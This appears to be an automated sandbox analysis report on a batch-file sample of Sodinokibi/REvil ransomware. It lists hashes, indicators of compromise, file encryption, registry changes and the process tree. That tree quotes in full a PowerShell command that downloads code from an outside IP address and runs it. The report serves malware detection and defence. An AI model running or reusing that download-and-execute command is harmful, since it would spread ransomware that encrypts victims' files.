Analysis

max time kernel: 129s
max time network: 140s
platform: windows10_x64
resource: win10
submitted: 24-08-2020 17:10

Static task: static1

Behavioral task: behavioral1
  Sample: 78db7807ce9e00993f72a5410cc869e8.bat
  Resource: win7v200722

Behavioral task: behavioral2
  Sample: 78db7807ce9e00993f72a5410cc869e8.bat
  Resource: win10
General

Target: 78db7807ce9e00993f72a5410cc869e8.bat
Size: 218B
MD5: 289804e7e330a37b07416d754819db89
SHA1: 8ed98b81615c3571fad40a840eae66f2de5fb035
SHA256: d9632dbb498dcc5c817f3d28376b83ce717767e8f2eda31dca931a781785dc09
SHA512: ac9649099ea34f88787d84761b3ea53acc436e847d91d2ac046d95cd176d8fe57a63b58ed726fae6f02507fe197e229ae664a4c903531642cd320ce1eeacce40
Malware Config

Extracted: http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8

Extracted: C:\p6v98e-read-me.txt
  Family: sodinokibi
Signatures

Sodin,Sodinokibi,REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (115 IoCs)
  Process: powershell.exe (pid 3864)
  Flows: 1, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36, 38, 40, 42, 44, 46, 48, 49, 51, 53, 55, 57, 58, 60, 62, 64, 66, 68, 70, 72, 74, 76, 78, 80, 82, 84, 86, 88, 90, 92, 96, 98, 100, 103, 107, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128, 130, 132, 134

Modifies extensions of user files (6 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Process: powershell.exe
  File renamed: C:\Users\Admin\Pictures\UninstallDismount.png => \??\c:\users\admin\pictures\UninstallDismount.png.p6v98e
  File renamed: C:\Users\Admin\Pictures\SaveStart.png => \??\c:\users\admin\pictures\SaveStart.png.p6v98e
  File opened for modification: \??\c:\users\admin\pictures\LimitResolve.tiff
  File renamed: C:\Users\Admin\Pictures\CheckpointCopy.crw => \??\c:\users\admin\pictures\CheckpointCopy.crw.p6v98e
  File renamed: C:\Users\Admin\Pictures\LimitResolve.tiff => \??\c:\users\admin\pictures\LimitResolve.tiff.p6v98e
  File renamed: C:\Users\Admin\Pictures\OpenStep.raw => \??\c:\users\admin\pictures\OpenStep.raw.p6v98e

Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 5 IoCs)
  Process: vssvc.exe
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}

Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Process: powershell.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ix64v514n03vt.bmp"

Drops file in Program Files directory (24 IoCs)
  Process: powershell.exe
  File created: \??\c:\program files\p6v98e-read-me.txt
  File created: \??\c:\program files (x86)\p6v98e-read-me.txt
  File opened for modification: \??\c:\program files\DebugGet.001
  File opened for modification: \??\c:\program files\DebugStart.edrwx
  File opened for modification: \??\c:\program files\MountStop.easmx
  File opened for modification: \??\c:\program files\StopStart.dwfx
  File opened for modification: \??\c:\program files\UninstallMerge.ini
  File opened for modification: \??\c:\program files\WriteNew.wvx
  File opened for modification: \??\c:\program files\ApprovePublish.m4a
  File opened for modification: \??\c:\program files\InitializeEnable.cfg
  File opened for modification: \??\c:\program files\InstallBlock.wmf
  File opened for modification: \??\c:\program files\ResumeLock.mht
  File opened for modification: \??\c:\program files\SearchApprove.mov
  File opened for modification: \??\c:\program files\StopUndo.potm
  File opened for modification: \??\c:\program files\InvokeEdit.ttf
  File opened for modification: \??\c:\program files\MergeBlock.mpv2
  File opened for modification: \??\c:\program files\OutWatch.aifc
  File opened for modification: \??\c:\program files\SaveOut.css
  File opened for modification: \??\c:\program files\ApproveConvert.au
  File opened for modification: \??\c:\program files\ConnectTest.ogg
  File opened for modification: \??\c:\program files\DebugDisconnect.otf
  File opened for modification: \??\c:\program files\EnterOptimize.m1v
  File opened for modification: \??\c:\program files\ResetStep.vsx
  File opened for modification: \??\c:\program files\ResetUnregister.DVR

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Process: powershell.exe
  pid 3864 powershell.exe (5 occurrences)

Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: powershell.exe, vssvc.exe
  Token: SeDebugPrivilege - pid 3864 powershell.exe
  Token: SeDebugPrivilege - pid 3864 powershell.exe
  Token: SeTakeOwnershipPrivilege - pid 3864 powershell.exe
  Token: SeBackupPrivilege - pid 2692 vssvc.exe
  Token: SeRestorePrivilege - pid 2692 vssvc.exe
  Token: SeAuditPrivilege - pid 2692 vssvc.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  Process: cmd.exe
  PID 344 wrote to memory of 3864 - 344 cmd.exe -> powershell.exe (3 occurrences)
Processes

C:\Windows\system32\cmd.exe (PID: 344)
  Command: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\78db7807ce9e00993f72a5410cc869e8.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID: 3864)
    Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/78db7807ce9e00993f72a5410cc869e8');Invoke-VHCXYJMKGXZ;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe (PID: 2692)
  Command: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken